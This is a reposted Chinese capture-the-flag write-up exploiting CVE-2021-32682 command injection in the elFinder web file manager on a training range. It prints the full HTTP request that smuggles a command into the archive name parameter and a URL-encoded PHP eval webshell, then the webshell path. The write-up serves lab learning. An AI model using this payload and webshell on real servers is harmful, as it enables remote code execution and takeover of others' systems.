声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权! 靶场介绍 elFinder 是一个开源的 web 文件管理器,使用 jQuery UI
elFinder 是一个开源的 web 文件管理器,使用 jQuery UI 用 JavaScript 编写。Creation 的灵感来自于 Mac OS X 操作系统中使用的 Finder 程序的简单性和便利性。 其低版本中存在命令注入
春秋云镜开启靶场:
http://eci-2zej5qhqolmn9pwfipad.cloudeci1.ichunqiu.com/
点击elfinder.html
上传1.txt 1.txt内容为空
创建压缩包 命名为2.zip
POC
GET /php/connector.minimal.php?cmd=archive&name=-TvTT=id>shell.PHP%20%23%20a.zip&target=l1_Lw&targets%5B1%5D=l1_Mi56aXA&targets%5B0%5D=l1_MS50eHQ&type=application%2Fzip Http/1.1Host: eci-2zej5qhqolmn9pwfipad.cloudeci1.ichunqiu.comUser-Agent: Mozilla/5.0 (windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/WEBp,**;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1670068031,1670127405,1670217594,1670236837; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1670242506; phpSESSID=lra53ti9bs3e8g387k3fupjjg0Upgrade-Insecure-Requests: 1echo '' 进行url编码
echo%20%27%3C%3Fphp%20%40eval%28%24_POST%5B%27caidao%27%5D%29%3B%3F%3E%27 
webshell地址
http://eci-2zej5qhqolmn9pwfipad.cloudeci1.ichunqiu.com/files/shell3.php
成功获取flag
来源地址:https://blog.csdn.net/niubi707/article/details/128192338
--结束END--
本文标题: [春秋云镜]CVE-2021-32682
本文链接: https://lsjlt.com/news/404799.html(转载时请注明来源链接)
有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
回答
回答
回答
回答
回答
回答
回答
回答
回答
回答
官方手机版
微信公众号
商务合作
0